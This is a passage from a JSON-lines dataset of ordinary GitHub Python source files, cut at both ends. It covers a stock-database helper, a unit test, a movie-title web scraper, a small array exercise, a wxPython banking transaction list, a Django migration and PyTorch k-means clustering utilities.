peList})\n # return klineDf\n\n\nif __name__ == '__main__':\n initlog()\n pass\n # hylist = getHYList()\n # print(readCurrentTTMPE('002508'))\n\n # 测试updateKlineEXTData\n ts_code = '000651'\n startDate = '2016-01-01'\n # updateKlineEXTData(ts_code, startDate)\n\n\ndef readTableFields(table):\n sql = (f'select column_name from information_schema.columns'\n f' where table_name=\"{table}\"')\n result = engine.execute(sql).fetchall()\n return ','.join([s[0] for s in result])","repo_name":"who8736/stockdatamanage","sub_path":"sqlrw.py","file_name":"sqlrw.py","file_ext":"py","file_size_in_byte":38921,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"41480482161","text":"from random import randint\nfrom unittest import TestCase\n\nfrom dominio.entidades import Competencia\nfrom dominio.enums import NivelDeCompetenciaEnum\nfrom dominio.objetos_de_valor import Id\nfrom testes.fabricas import FabricaTesteId\n\n\nclass TestCompetencia(TestCase):\n def test_construir_QUANDO_atributos_informados_ENTAO_retorna_competencia(self) -> None:\n docente_id = FabricaTesteId.build()\n disciplina_id = FabricaTesteId.build()\n nivel = 2\n\n competencia = Competencia.construir(\n docente_id=docente_id,\n disciplina_id=disciplina_id,\n nivel=nivel\n )\n\n esperado = Competencia(\n docente_id=Id(docente_id),\n disciplina_id=Id(disciplina_id),\n nivel=NivelDeCompetenciaEnum.DOIS\n )\n self.assertEqual(competencia, esperado)\n","repo_name":"fr-mm/competencias-backend","sub_path":"testes/unitarios/dominio/entidades/test_competencia.py","file_name":"test_competencia.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"es","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"17704874054","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\n\r\nresponse = requests.get(url=\"http://web.archive.org/web/20200518055830/https://www.empireonline.com/movies/features/best-movies-2/\")\r\nwebsite_html = response.text\r\n\r\nsoup = BeautifulSoup(website_html, \"html.parser\")\r\nall_movie = (soup.find_all(name=\"h3\", class_=\"title\"))\r\nprint(all_movie)\r\nmovie_titles = [movie.getText() for movie in all_movie]\r\nmovie_titles.reverse()\r\nprint(movie_titles)\r\n\r\nwith open(\"movies.txt\", mode=\"w\") as file:\r\n for movie in movie_titles:\r\n data = file.write(f\"{movie}\\n\")\r\n\r\n\r\n","repo_name":"AnubhavRathore/Top-100-Movies","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26428277812","text":"\"\"\"\n\nВо втором массиве сохранить индексы четных элементов первого массива. Например, если дан массив со значениями\n8, 3, 15, 6, 4, 2, второй массив надо заполнить значениями 0, 3, 4, 5, (индексация начинается с нуля), т.к. именно\nв этих позициях первого массива стоят четные числа.\n\n\"\"\"\nimport random\n\nSIZE = 10\nMIN_ITEM = 0\nMAX_ITEM = 100\nlist_numbers = [random.randint(MIN_ITEM, MAX_ITEM) for _ in range(SIZE)] #[_ for _ in range(10)] - for testing\nprint(f'Исходный массив:\\n {list_numbers}')\n\nnew_list = []\n\nfor idx, item in enumerate(list_numbers):\n if item % 2 == 0:\n new_list.append(idx)\nprint(f'Итоговый массив , элементами которого являются позиции четных элементов иходного массива:\\n {new_list}')\n","repo_name":"SergeyDuvanskiy/AlgorithmsInPython","sub_path":"Lesson_3/task_2.py","file_name":"task_2.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3536299863","text":"import threading\nimport wx, datetime\nfrom wxbanker.lib.pubsub import Publisher\nfrom wxbanker.ObjectListView import GroupListView, ColumnDefn, CellEditorRegistry\nfrom wxbanker import bankcontrols, tagtransactiondialog\n\nfrom wxbanker.currencies import GetCurrencyInt\n\nclass TransactionOLV(GroupListView):\n EMPTY_MSG_NORMAL = _(\"No transactions entered.\")\n EMPTY_MSG_SEARCH = _(\"No matching transactions.\")\n \n def __init__(self, parent, bankController):\n GroupListView.__init__(self, parent, style=wx.LC_REPORT|wx.SUNKEN_BORDER, name=\"TransactionOLV\")\n self.LastSearch = None\n self.CurrentAccount = None\n self.BankController = bankController\n\n self.showGroups = False\n #WXTODO: figure out these (and the text color, or is that already?) from theme (LP: ???)\n self.evenRowsBackColor = wx.Colour(224,238,238)\n self.oddRowsBackColor = wx.WHITE\n\n self.cellEditMode = GroupListView.CELLEDIT_DOUBLECLICK\n self.SetEmptyListMsg(self.EMPTY_MSG_NORMAL)\n\n # Calculate the necessary width for the date column.\n dateStr = str(datetime.date.today())\n dateWidth = self.GetTextExtent(dateStr)[0] + 10\n\n # Define some constants to use throughout.\n self.COL_DATE = 0\n self.COL_DESCRIPTION = 1\n self.COL_AMOUNT = 2\n self.COL_TOTAL = 3\n\n # If you change these column names, update sizeAmounts()!\n self.SetColumns([\n ColumnDefn(_(\"Date\"), valueGetter=self.getDateAndIDOf, valueSetter=self.setDateOf, stringConverter=self.renderDateIDTuple, editFormatter=self.renderEditDate, width=dateWidth),\n ColumnDefn(_(\"Description\"), valueGetter=\"Description\", isSpaceFilling=True, editFormatter=self.renderEditDescription),\n ColumnDefn(_(\"Amount\"), \"right\", valueGetter=self.getAmount, valueSetter=self.setAmount, stringConverter=self.renderFloat, editFormatter=self.renderEditFloat),\n ColumnDefn(_(\"Balance\"), \"right\", valueGetter=self.getTotal, stringConverter=self.renderFloat, isEditable=False),\n ])\n # Our custom hack in OLV.py:2017 will render amount floats appropriately as %.2f when editing.\n\n # By default, sort by the date column, ascending.\n self.SORT_COL = self.COL_DATE\n self.SortBy(self.SORT_COL)\n \n self.Bind(wx.EVT_RIGHT_DOWN, self.onRightDown)\n\n self.Subscriptions = (\n (self.onSearch, \"SEARCH.INITIATED\"),\n (self.onSearchCancelled, \"SEARCH.CANCELLED\"),\n (self.onSearchMoreToggled, \"SEARCH.MORETOGGLED\"),\n (self.onTransactionAdded, \"transaction.created\"),\n (self.onTransactionsRemoved, \"transactions.removed\"),\n (self.onCurrencyChanged, \"currency_changed\"),\n (self.onShowCurrencyNickToggled, \"controller.show_currency_nick_toggled\"),\n (self.updateTotals, \"ormobject.updated.Transaction.Amount\"),\n (self.onTransactionDateUpdated, \"ormobject.updated.Transaction.Date\"),\n )\n\n for callback, topic in self.Subscriptions:\n Publisher.subscribe(callback, topic)\n \n def SetObjects(self, objs, *args, **kwargs):\n \"\"\"\n Override the default SetObjects to properly refresh the auto-size,\n and clear out any cached Totals as they may not be valid IE when we\n search and have a subset of transactions.\n \"\"\"\n # Remove any previously cached totals, to fix search totals.\n GroupListView.SetObjects(self, objs, *args, **kwargs)\n self.updateTotals()\n\n # Force a re-size here, in the case that the vscrollbar-needed state\n # changed by this set account, to size correctly.\n wx.CallLater(50, self._ResizeSpaceFillingColumns)\n \n def IsSearchActive(self):\n return self.GrandParent.searchActive\n \n def SetSearchActive(self, value):\n self.GrandParent.searchActive = value\n \n def onTransactionDateUpdated(self, message):\n transaction = message.data\n self.RefreshObject(transaction)\n self.SortBy(self.SORT_COL)\n self.updateTotals()\n\n def getDateAndIDOf(self, transaction):\n # A date and ID two-tuple is used to allow for correct sorting\n # by date (bug #653697)\n return (transaction.Date, transaction.ID)\n\n def setDateOf(self, transaction, date):\n transaction.Date = date\n self.Freeze()\n self.SortBy(self.SORT_COL)\n self.Thaw()\n \n def setAmount(self, transaction, amount):\n transaction.Amount = amount\n self.Freeze()\n self.SortBy(self.SORT_COL)\n self.Thaw()\n\n def getTotal(self, transObj):\n if not hasattr(transObj, \"_Total\"):\n self.updateTotals()\n \n return transObj._Total\n \n def updateTotals(self, message=None):\n first = self.GetObjectAt(0)\n if first is None:\n return\n \n if not self.CurrentAccount:\n #This means we are in 'All accounts' so we need to convert each total\n # to the global currency\n balance_currency = self.BankController.Model.GlobalCurrency\n else:\n #we are just viewing a single account\n # balance currency = accounts currency\n balance_currency = GetCurrencyInt(self.CurrentAccount.GetCurrency())\n \n first._Total = first.GetAmount(balance_currency)\n \n b = first\n for i in range(1, len(self.GetObjects())):\n a, b = b, self.GetObjectAt(i)\n b._Total = a._Total + b.GetAmount(balance_currency)\n \n def renderDateIDTuple(self, pair):\n return str(pair[0])\n \n def getAmount(self, obj):\n #Return the whole transaction/float since we need to use its\n #renderAmount method to support multiple currencies.\n return obj \n \n def renderFloat(self, value):\n if isinstance(value, float):\n #this is a 'balance' column, its ok to use the bank model's float2str\n # as long as we'r not in an account.\n if self.CurrentAccount:\n return self.CurrentAccount.float2str(value)\n else:\n return self.BankController.Model.float2str(value)\n else:\n #this is a trnasaction, so it belogns to the 'Amount' column, render\n # it with its appropieate currency\n return value.RenderAmount()\n \n def renderEditDate(self, transaction):\n return str(transaction.Date)\n \n def renderEditFloat(self, modelObj):\n return \"%.2f\" % modelObj.Amount\n \n def renderEditDescription(self, modelObj):\n return modelObj._Description\n\n def _sizeAmounts(self):\n \"\"\"Set the width of the Amount and Total columns based on the approximated widest value.\"\"\"\n transactions = self.GetObjects()\n # If there aren't any transactions, there's nothing to do.\n if len(transactions) == 0:\n return\n\n for i, attr in enumerate((\"Amount\", \"_Total\")):\n # Sort by amount, then compare the highest and lowest, to take into account a negative sign.\n sortedtrans = list(sorted(transactions, cmp=lambda a,b: cmp(getattr(a, attr), getattr(b, attr))))\n high, low = sortedtrans[0], sortedtrans[-1]\n # Get the (translated) displayed column name to calculate width.\n header = _({\"_Total\": \"Balance\"}.get(attr, attr))\n # Take the max of the two as well as the column header width, as we need to at least display that.\n widestWidth = max([self.GetTextExtent(header)[0]] + [self.GetTextExtent(self.renderFloat(getattr(t, attr)))[0] for t in (high, low)])\n wx.CallAfter(self.SetColumnFixedWidth, *(self.COL_AMOUNT+i, widestWidth + 10))\n\n def sizeAmounts(self):\n threading.Thread(target=self._sizeAmounts).start()\n\n def setAccount(self, account, scrollToBottom=True):\n self.CurrentAccount = account\n\n if account is None:\n # None represents the \"All accounts\" option, so we want all transactions.\n transactions = self.BankController.Model.GetTransactions()\n else:\n transactions = account.Transactions\n\n self.SetObjects(transactions)\n # Update the width of the amount/total columns.\n self.sizeAmounts()\n # Unselect everything.\n self.SelectObjects([], deselectOthers=True)\n if scrollToBottom:\n self.ensureVisible(-1)\n \n if self.IsSearchActive():\n self.doSearch(self.LastSearch)\n\n def ensureVisible(self, index):\n length = self.GetItemCount()\n # If there are no items, ensure a no-op (LP: #338697)\n if length:\n if index < 0:\n index = length + index\n self.EnsureCellVisible(index, 0)\n\n def onRightDown(self, event):\n itemID, flag, col = self.HitTestSubItem(event.Position)\n\n # Don't do anything for right-clicks not on items.\n if itemID != -1:\n if not self.GetItemState(itemID, wx.LIST_STATE_SELECTED):\n self._SelectAndFocus(itemID)\n transactions = self.GetSelectedObjects()\n self.showContextMenu(transactions, col)\n\n def showContextMenu(self, transactions, col, removeOnly=False):\n # This seems unlikely but let's defend against it.\n if not transactions:\n return\n \n menu = wx.Menu()\n \n # removeOnly means only show the remove entry, such as from the CSV import frame.\n if not removeOnly:\n # If the right-click was on the total column, use the total, otherwise the amount.\n if col == self.COL_TOTAL:\n # Use the last total if multiple are selected.\n amount = transactions[-1]._Total\n else:\n amount = sum((t.Amount for t in transactions))\n \n val = self.BankController.Model.float2str(amount)\n\n actions = [\n (_(\"Send %s to calculator\") % val, \"wxART_calculator_edit\"),\n (_(\"Add %s to calculator\") % val, \"wxART_calculator_add\"),\n (_(\"Subtract %s from calculator\") % val, \"wxART_calculator_delete\"),\n ]\n\n for i, (actionStr, artHint) in enumerate(actions):\n item = wx.MenuItem(menu, -1, actionStr)\n item.SetBitmap(wx.ArtProvider.GetBitmap(artHint))\n menu.Bind(wx.EVT_MENU, lambda e, i=i: self.onCalculatorAction(transactions, col, i), source=item)\n menu.AppendItem(item)\n menu.AppendSeparator()\n\n # Always show the Remove context entry.\n if len(transactions) == 1:\n removeStr = _(\"Remove this transaction\")\n moveStr = _(\"Move this transaction to account\")\n tagStr = _(\"No tags yet\")\n else:\n removeStr = _(\"Remove these %i transactions\") % len(transactions)\n moveStr = _(\"Move these %i transactions to account\") % len(transactions)\n tagStr = _(\"No common tags yet\")\n \n addTagStr = _(\"Add a tag\")\n\n removeItem = wx.MenuItem(menu, -1, removeStr)\n menu.Bind(wx.EVT_MENU, lambda e: self.onRemoveTransactions(transactions), source=removeItem)\n removeItem.SetBitmap(wx.ArtProvider.GetBitmap('wxART_delete'))\n menu.AppendItem(removeItem)\n\n if not removeOnly:\n # Create the sub-menu of sibling accounts to the move to.\n moveToAccountItem = wx.MenuItem(menu, -1, moveStr)\n accountsMenu = wx.Menu()\n if self.CurrentAccount is None:\n siblings = []\n else:\n siblings = self.CurrentAccount.GetSiblings()\n for account in siblings:\n accountItem = wx.MenuItem(menu, -1, account.GetName())\n accountsMenu.AppendItem(accountItem)\n accountsMenu.Bind(wx.EVT_MENU, lambda e, account=account: self.onMoveTransactions(transactions, account), source=accountItem)\n moveToAccountItem.SetSubMenu(accountsMenu)\n moveMenuItem = menu.AppendItem(moveToAccountItem)\n \n # The tag menu.\n tagsItem = wx.MenuItem(menu, -1, _(\"Tags\"))\n tagsMenu = wx.Menu()\n\n ## The initial tags are the ones in the first transaction. If there are more, intersect across them.\n commonTags = set(transactions[0].Tags)\n for transaction in transactions[1:]:\n commonTags = commonTags.intersection(transaction.Tags)\n \n ## If we have any common tags, add them to the menu, otherwise the no tags item.\n if commonTags:\n for tag in commonTags:\n tagItem = wx.MenuItem(tagsMenu, -1, tag.Name)\n tagItemMenu = wx.Menu()\n searchItem = tagItemMenu.Append(-1, _(\"Search for this tag\"))\n removeItem = tagItemMenu.Append(-1, _(\"Remove this tag\"))\n tagItem.SetSubMenu(tagItemMenu)\n tagsMenu.AppendItem(tagItem)\n \n tagItemMenu.Bind(wx.EVT_MENU, lambda e, tag=tag: self.onTagSearch(tag), source=searchItem)\n tagItemMenu.Bind(wx.EVT_MENU, lambda e, tag=tag: self.onTagRemoval(tag, transactions), source=removeItem)\n else:\n noTagsItem = tagsMenu.Append(-1, tagStr)\n tagsMenu.Enable(noTagsItem.Id, False)\n tagsMenu.AppendSeparator()\n addItem = tagsMenu.Append(-1, addTagStr)\n tagsItem.SetSubMenu(tagsMenu)\n tagsMenu.Bind(wx.EVT_MENU, lambda e: self.onTagTransactions(transactions), source=addItem)\n \n ## Append it at the bottom after a separator.\n menu.AppendSeparator()\n menu.AppendItem(tagsItem)\n \n # If there are no siblings, disable the item, but leave it there for consistency.\n if not siblings:\n menu.Enable(moveMenuItem.Id, False)\n\n # Show the menu and then destroy it afterwards.\n self.PopupMenu(menu)\n menu.Destroy()\n\n def onCalculatorAction(self, transactions, col, i):\n \"\"\"\n Given an action to perform on the calculator, and the row and col,\n generate the string of characters necessary to perform that action\n in the calculator, and push them.\n \"\"\"\n if col == self.COL_TOTAL:\n # Use the last total if multiple are selected.\n amount = transactions[-1]._Total\n else:\n amount = sum((t.Amount for t in transactions))\n\n pushStr = ('C%s', '+%s=', '-%s=')[i] # Send, Add, Subtract commands\n pushStr %= amount\n\n Publisher.sendMessage(\"CALCULATOR.PUSH_CHARS\", pushStr)\n\n def onRemoveTransactions(self, transactions):\n \"\"\"Remove the transactions from the account.\"\"\"\n if self.CurrentAccount:\n self.CurrentAccount.RemoveTransactions(transactions)\n # We won't have a CurrentAccount when viewing all accounts (LP: #620924)\n else:\n for transaction in transactions:\n transaction.Parent.RemoveTransaction(transaction)\n\n def onMoveTransactions(self, transactions, targetAccount):\n \"\"\"Move the transactions to the target account.\"\"\"\n self.CurrentAccount.MoveTransactions(transactions, targetAccount)\n\n def frozenResize(self):\n self.Parent.Layout()\n self.Parent.Thaw()\n\n def onTransactionsRemoved(self, message):\n account, transactions = message.data\n if account is self.CurrentAccount:\n # Remove the item from the list.\n self.RemoveObjects(transactions)\n self.updateTotals()\n self.sizeAmounts()\n \n def onTransactionAdded(self, message):\n account, transaction = message.data\n if account is self.CurrentAccount:\n self.AddObject(transaction)\n self.updateTotals()\n self.Reveal(transaction)\n self.sizeAmounts()\n\n def onTagSearch(self, tag):\n Publisher.sendMessage(\"SEARCH.EXTERNAL\", str(tag))\n \n def onTagRemoval(self, tag, transactions):\n for transaction in transactions:\n transaction.RemoveTag(tag)\n # The removal won't appear unless we refresh the affected transactions.\n self.RefreshObjects(transactions)\n \n def onTagTransactions(self, transactions):\n dlg = tagtransactiondialog.TagTransactionsDialog(self, transactions)\n dlg.ShowModal()\n # Unconditionally refresh, since hitting enter in the tag field requires a refresh but doesn't provide a useful result.\n self.RefreshObjects(transactions)\n \n def onSearch(self, message):\n self.SetEmptyListMsg(self.EMPTY_MSG_SEARCH)\n self.LastSearch = message.data\n self.doSearch(self.LastSearch)\n \n def doSearch(self, searchData):\n searchString, match = searchData\n account = self.CurrentAccount\n matches = self.BankController.Model.Search(searchString, account=account, matchIndex=match)\n self.SetObjects(matches)\n self.SetSearchActive(True)\n\n def onSearchCancelled(self, message):\n # Ignore cancels on an inactive search to avoid silly refreshes.\n if self.IsSearchActive():\n self.SetSearchActive(False)\n self.setAccount(self.CurrentAccount)\n self.SetEmptyListMsg(self.EMPTY_MSG_NORMAL)\n\n def onSearchMoreToggled(self, message):\n # Perhaps necessary to not glitch overlap on Windows?\n self.Refresh()\n\n def onCurrencyChanged(self, message):\n # Refresh all the transaction objects, re-rendering the amounts.\n self.RefreshObjects()\n # The current likely changed the widths of the amount/total column.\n self.sizeAmounts()\n # Now we need to adjust the description width so we don't have a horizontal scrollbar.\n self.AutoSizeColumns()\n \n def onShowCurrencyNickToggled(self, message):\n # Refresh all the transaction objects, re-rendering the amounts.\n self.RefreshObjects()\n # The current likely changed the widths of the amount/total column.\n self.sizeAmounts()\n # Now we need to adjust the description width so we don't have a horizontal scrollbar.\n self.AutoSizeColumns()\n \n def __del__(self):\n for callback, topic in self.Subscriptions:\n Publisher.unsubscribe(callback)\n","repo_name":"mrooney/wxbanker","sub_path":"wxbanker/transactionolv.py","file_name":"transactionolv.py","file_ext":"py","file_size_in_byte":18575,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"61"} +{"seq_id":"44071681151","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('contacts', '0023_properties_display_on_list'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='contact',\n name='company',\n field=models.ForeignKey(verbose_name='société', to='contacts.Company', null=True, blank=True, related_name='contacts'),\n ),\n ]\n","repo_name":"vegaelle/pyru","sub_path":"contacts/migrations/0024_auto_20151020_1632.py","file_name":"0024_auto_20151020_1632.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70702985474","text":"r\"\"\"Module of utility functionalities used in different parts of the\npackage.\n\nAuthor: Jonas C. Ditz\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport torch\nimport torch.nn.functional as F\nfrom scipy import stats\nfrom sklearn.cluster import KMeans\nfrom sklearn.metrics import (\n accuracy_score,\n average_precision_score,\n f1_score,\n log_loss,\n matthews_corrcoef,\n precision_recall_curve,\n roc_auc_score,\n)\n\n\ndef _init_kmeans(\n x: torch.Tensor,\n n_clusters: int,\n n_local_trials: int = None,\n use_cuda: bool = False,\n distance: str = \"euclidean\",\n):\n r\"\"\"Initialization method for K-Means (k-Means++)\n\n Parameters\n ----------\n x : Tensor\n Data that will be used for clustering provided as a tensor of shape\n (n_samples x n_dimensions).\n n_clusters : int\n Number of clusters that will be computed.\n n_local_trials : int\n Number of local seeding trails. Defaults to None.\n use_cuda : bool\n Flag that determines whether computations should be performed on the GPU.\n Defaults to False.\n distance : str\n Distance measure used for clustering. Defaults to 'euclidean'.\n \n Returns\n -------\n clusters : Tensor\n Initial centers for each cluster.\n \"\"\"\n n_samples, n_features = x.size()\n\n # initialize tensor that will hold the cluster centers and send it to GPU if needed\n clusters = torch.Tensor(n_clusters, n_features)\n if use_cuda:\n clusters = clusters.cuda()\n\n # Set the number of local seeding trials if none is given\n if n_local_trials is None:\n n_local_trials = 2 + int(np.log(n_clusters))\n\n # pick first cluster center randomly\n clusters[0] = x[np.random.randint(n_samples)]\n\n # initialize list of distances to the selected centroid and calculate current potential\n if distance == \"cosine\":\n # calculate distance of each point to the selected centroid using the distance measure of the spherical k-Means\n closest_dist_sq = 1 - clusters[[0]].mm(x.t())\n closest_dist_sq = closest_dist_sq.view(-1)\n elif distance == \"euclidean\":\n # calculate distance of each point to the selected centroid using the Euclidean distance measure\n closest_dist_sq = torch.cdist(clusters[[0]], x, p=2)\n closest_dist_sq = closest_dist_sq.view(-1)\n else:\n raise ValueError(\"Unknown value for parameter mode: {}\".format(distance))\n current_pot = closest_dist_sq.sum().item()\n\n # pick the remaining n_clusters-1 cluster centers\n for c in range(1, n_clusters):\n # Choose center candidates by sampling with probability proportional to the squared distance to the closest\n # existing center\n rand_vals = np.random.random_sample(n_local_trials) * current_pot\n candidate_ids = np.searchsorted(closest_dist_sq.cumsum(-1).cpu(), rand_vals)\n\n # calculate distance of each data point to the candidates\n if distance == \"cosine\":\n distance_to_candidates = 1 - x[candidate_ids].mm(x.t())\n elif distance == \"euclidean\":\n distance_to_candidates = torch.cdist(x[candidate_ids], x, p=2)\n else:\n raise ValueError(\"Unknown value for parameter mode: {}\".format(distance))\n\n # iterate over the candidates for the new cluster center and select the most suitable\n best_candidate = None\n best_pot = None\n best_dist_sq = None\n for trial in range(n_local_trials):\n # Compute potential when including center candidate\n new_dist_sq = torch.min(closest_dist_sq, distance_to_candidates[trial])\n new_pot = new_dist_sq.sum().item()\n\n # Store result if it is the best local trial so far\n if (best_candidate is None) or (new_pot < best_pot):\n best_candidate = candidate_ids[trial]\n best_pot = new_pot\n best_dist_sq = new_dist_sq\n\n clusters[c] = x[best_candidate]\n current_pot = best_pot\n closest_dist_sq = best_dist_sq\n\n return clusters\n\n\ndef kmeans_gpu(\n x: torch.Tensor,\n n_clusters: int,\n distance: str = \"euclidian\",\n max_iters: int = 100,\n verbose: bool = True,\n init: str = None,\n tol: float = 1e-4,\n):\n r\"\"\"Performing k-Means clustering (Lloyd's algorithm) with Tensors utilizing GPU resources.\n\n Parameters\n ----------\n x : Tensor\n Data that will be used for clustering provided as a tensor of shape\n (n_samples x n_dimensions).\n n_clusters : int\n Number of clusters that will be computed.\n distance : str\n Distance measure used for clustering. Defaults to 'euclidean'.\n max_iters : int\n Maximal number of iterations used in the K-Means clustering. Defaults to 100.\n verbose : bool\n Flag to activate verbose output. Defaults to True.\n init : str\n Initialization process for the K-Means algorithm. Defaults to None.\n tol : float\n Relative tolerance with regards to Frobenius norm of the difference in the cluster\n centers of two consecutive iterations to declare convergence. It's not advised to set\n `tol=0` since convergence might never be declared due to rounding errors. Use a very\n small number instead. Defaults to 1e-4.\n\n Returns\n -------\n clusters : Tensor\n Tensor that contains the cluster centers, i.e. result of the K-Means algorithm. The shape of\n the tensor is (n_clusters x n_dimensions).\n \"\"\"\n # make sure there are more samples than requested clusters\n if x.shape[0] < n_clusters:\n raise ValueError(\n f\"n_samples={x.shape[0]} should be >= n_clusters={n_clusters}.\"\n )\n\n # check whether the input tensor is on the GPU\n use_cuda = x.is_cuda\n\n # store number of data points and dimensionality of each data point\n n_samples, n_features = x.size()\n\n # determine initialization procedure for this run of the k-Means algorithm\n if init == \"k-means++\":\n print(\" Initialization method for k-Means: k-Means++\")\n clusters = _init_kmeans(x, n_clusters, use_cuda=use_cuda, distance=distance)\n elif init is None:\n print(\" Initialization method for k-Means: random\")\n indices = torch.randperm(n_samples)[:n_clusters]\n if use_cuda:\n indices = indices.cuda()\n clusters = x[indices]\n else:\n raise ValueError(\"Unknown initialization procedure: {}\".format(init))\n\n # perform Lloyd's algorithm iteratively until convergence or the number of iterations exceeds max_iters\n prev_sim = np.inf\n for n_iter in range(max_iters):\n # calculate the distance of data points to clusters using the selected distance measure. Use the calculated\n # distances to assign each data point to a cluster\n if distance == \"cosine\":\n sim = x.mm(clusters.t())\n tmp, assign = sim.max(dim=-1)\n elif distance == \"euclidean\":\n sim = torch.cdist(x, clusters, p=2)\n tmp, assign = sim.min(dim=-1)\n else:\n raise ValueError(\"Unknown distance measure: {}\".format(distance))\n\n # get the mean distance to the cluster centers\n sim_mean = tmp.mean()\n if (n_iter + 1) % 10 == 0 and verbose:\n print(\n \" k-Means iter: {}, distance: {}, objective value: {}\".format(\n n_iter + 1, distance, sim_mean\n )\n )\n\n # update clusters\n for j in range(n_clusters):\n # get all data points that were assigned to the current cluster\n index = assign == j\n\n # if no data point was assigned to the current cluster, use the data point furthest away from every cluster\n # as new cluster center\n if index.sum() == 0:\n if distance == \"cosine\":\n idx = tmp.argmin()\n elif distance == \"euclidean\":\n idx = tmp.argmax()\n clusters[j] = x[idx]\n tmp[idx] = 1\n\n # otherwise, update the center of the current cluster based on all data points assigned to this cluster\n else:\n xj = x[index]\n c = xj.mean(0)\n clusters[j] = c / c.norm()\n\n # stop k-Means if the difference in the cluster center is below the tolerance (i.e. the algorithm converged)\n if torch.abs(prev_sim - sim_mean) / (torch.abs(sim_mean) + 1e-20) < tol:\n break\n prev_sim = sim_mean\n\n return clusters\n\n\ndef kmeans(\n x: torch.Tensor,\n n_clusters: int,\n distance: str = \"euclidian\",\n max_iters: int = 100,\n verbose: bool = True,\n init: str = None,\n tol: float = 1e-4,\n use_cuda: bool = False,\n):\n r\"\"\"Wrapper for the k-Means clustering algorithm to utilize either GPU or CPU resources.\n We always recommend to use the well-tested scikit-learn implementation (i.e. set\n 'use_cuda' to False) unless there is an important reason to utilize GPU.\n\n Parameters\n ----------\n x : Tensor\n Data that will be used for clustering provided as a tensor of shape\n (n_samples x n_dimensions).\n n_clusters : int\n Number of clusters that will be computed.\n distance : str\n Distance measure used for clustering. Defaults to 'euclidean'.\n max_iters : int\n Maximal number of iterations used in the K-Means clustering. Defaults to 100.\n verbose : bool\n Flag to activate verbose output. Defaults to True.\n init : str\n Initialization process for the K-Means algorithm. Defaults to None.\n tol : float\n Relative tolerance with regards to Frobenius norm of the difference in the cluster\n centers of two consecutive iterations to declare convergence. It's not advised to set\n `tol=0` since convergence might never be declared due to rounding errors. Use a very\n small number instead. Defaults to 1e-4.\n use_cuda : bool\n Determine whether to utilize GPU resources or compute kmeans on CPU resources. If set to\n False, scikit-learn's implementation of kmeans will be used. Defaults to False.\n \n Returns\n -------\n clusters : Tensor\n Tensor that contains the cluster centers, i.e. result of the K-Means algorithm. The shape of\n the tensor is (n_clusters x n_dimensions).\n \"\"\"\n # use GPU implementation if use_cuda was set to true\n if use_cuda:\n clusters = kmeans_gpu(x, n_clusters, distance, max_iters, verbose, init, tol)\n\n # otherwise, cast Tensors to numpy arrays and use scikit-learn's implementation of kmeans\n else:\n aux_x = x.cpu().numpy()\n sklearn_kmeans = KMeans(\n n_clusters=n_clusters,\n init=init,\n max_iter=max_iters,\n tol=tol,\n verbose=int(verbose),\n algorithm=\"full\",\n ).fit(aux_x)\n\n clusters = torch.Tensor(sklearn_kmeans.cluster_centers_)\n\n # make sure that the cluster centers are on the GPU if the input is on the GPU\n if x.is_cuda:\n clusters = clusters.cuda()\n\n return clusters\n\n\ndef sample_data(\n data_loader: torch.utils.data.DataLoader, n_features: int, n_samples: int = 100000\n):\n r\"\"\"Utility function that returns a specified number of samples as a tensor. The samples will\n be taken from a specified PyTorch DataLoader object.\n\n Parameters\n ----------\n data_loader : torch.utils.data.DataLoader\n PyTorch DataLoader object that handles access to training data. In general, other objects \n can be used to access the data. The only prerequisite is that it is possible to retreive\n the data and label as PyTorch Tensors when iterated over the object. We strongly recommend\n to use a PyTorch DataLoader object.\n n_features : int\n Number of features in the data set. In other words, the data set consists of data points\n with n_features dimentions.\n n_samples : int\n Number of data points that will be sampled from the data.\n\n Returns\n -------\n samples : Tensor\n Tensor containing the sampled data points.\n \"\"\"\n # initialize the Tensor that stores all sampled data points\n samples = torch.zeros(n_samples, n_features)\n\n # determine the number of data points sampled per batch\n # -> we make sure that we sample at least 500 data points per batch to reduce runtime\n n_samples_per_batch = max(\n (n_samples + len(data_loader) - 1) // len(data_loader), 500\n )\n\n # iterate over the data set\n already_sampled = 0\n for data, _ in data_loader:\n # stop if already enough data points have been sampled\n if already_sampled >= n_samples:\n break\n\n # make sure to sample at most the number of data points in the current batch\n max_samples_per_batch = min(data.size(0), n_samples_per_batch)\n\n # sample random indices of the data Tensor (number of sampled indices is either the\n # maximum number of data points or n_samples_per_batch, whatever is smaller)\n indices = torch.randperm(data.size(0))[:max_samples_per_batch]\n current_samples = data[indices]\n\n # only use a subset of the sampled data points in this batch, if this batch would\n # exceed the maximum number of samples\n current_size = current_samples.size(0)\n if already_sampled + current_size > n_samples:\n current_size = n_samples - already_sampled\n data_oliogmers = data_oliogmers[:current_size]\n\n # update the samples Tensor with the current batch of sampled data points\n samples[already_sampled : already_sampled + current_size] = current_samples\n already_sampled += current_size\n\n # return the sampled data points\n print(f\"sample_data routine returned {already_sampled} sampled data points\")\n return samples[:already_sampled, :]\n\n\ndef sample_data_multiomics(\n data_loader: torch.utils.data.DataLoader, n_features: list, n_samples: int = 100000\n):\n r\"\"\"Data sampling utility function that is specily designed for multi omics datasets.\n\n Parameters\n ----------\n data_loader : torch.utils.data.DataLoader\n PyTorch DataLoader object that handles access to training data. In general, other objects \n can be used to access the data. The only prerequisite is that it is possible to retreive\n the data and label as PyTorch Tensors when iterated over the object. We strongly recommend\n to use a PyTorch DataLoader object.\n n_features : int\n Number of features in the data set. In other words, the data set consists of data points\n with n_features dimentions.\n n_samples : int\n Number of data points that 